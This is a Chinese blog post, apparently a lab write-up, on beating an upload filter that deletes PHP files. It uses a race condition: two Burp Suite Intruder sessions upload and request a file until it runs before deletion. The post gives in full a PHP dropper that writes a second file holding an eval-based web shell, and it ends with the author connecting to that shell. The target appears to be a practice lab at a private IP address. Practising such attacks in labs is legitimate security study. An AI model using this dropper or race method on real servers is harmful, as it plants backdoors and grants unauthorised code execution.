一、正常上传php文件被删除
你这么暴力,刚上传就删除,解决思路就是不停地上传,你要接收文件、判断文件、删除文件总要时间吧;
那我见缝插针,不停地调用上传的文件,一旦成功就写入另一ma,也就是ma中ma,试一下吧,要用两个burpsuite(双开,哈哈)
二、Attack步骤
(一)准备父上传文件1.php并上传
<?php $f=fopen("7.php","w"); fputs($f,'<?php @eval($_POST[cmd]);?>');?>
该语句在测试过程中卡了很久,不能用双引号和单引号嵌套,幸好cmd可以不要引号
目标:是一旦在缝隙中执行成功,则生成7.php文件
(二)文件照常被删除,那我用burpsuite-Intruder不停上传
1.发送到Intruder
2.配置户数点
3.开始attack
(三)另开一burpsuite窗口不断访问1.php文件以生成7.php
1.设置代理开关
关闭之前burpsuite的代理功能,开启第2个burpsuite窗口的代理
2.获取正确地址
输入以下网址,也就是上传路径(通过之前上传成功的路径可分析得到)
http://192.168.182.130:8001/upload/uploads/1.php
3.发送到Intruder
4.设置户数器
5.同样设置10万次看看能否成功(图片略)
(四)两边同时开始Attack
1.左右边对比
左边:上传一直进行,且一直在删除
右边:终有一次在删除前被执行,状态代码200,且返回内容只有192字节,我知道已经成功了
2.Attack还未完成就已经成功生成了目标文件
三、测试连接
通过刚生成的文件,连接成功!可以休息了!
757
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
